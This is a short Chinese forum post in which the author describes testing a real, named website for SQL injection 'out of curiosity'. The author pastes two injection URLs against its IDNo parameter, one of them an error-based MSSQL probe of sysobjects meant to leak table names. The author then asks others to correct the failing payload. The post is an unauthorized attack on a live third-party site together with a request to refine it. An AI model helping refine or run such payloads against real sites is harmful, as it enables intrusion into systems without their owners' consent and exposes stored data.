这个可以SQL注入网站
我出于好奇试了个网站,没想到真没有屏蔽SQL注入。 我不是恶意破坏,只是玩。但是没有成功
http://www.jzfuwu.net/ADomesticRead.aspx?IDNo=11620' and select name from sysobjects where name>0 and 1= '1
返回的结果跟我想要的不一样。 没有提示哪个表转换INT出错, 希望有人提示下, 在哪拼错了
http://www.jzfuwu.net/ADomesticRead.aspx?IDNo=11620' and 1= '1 但是这么写就对。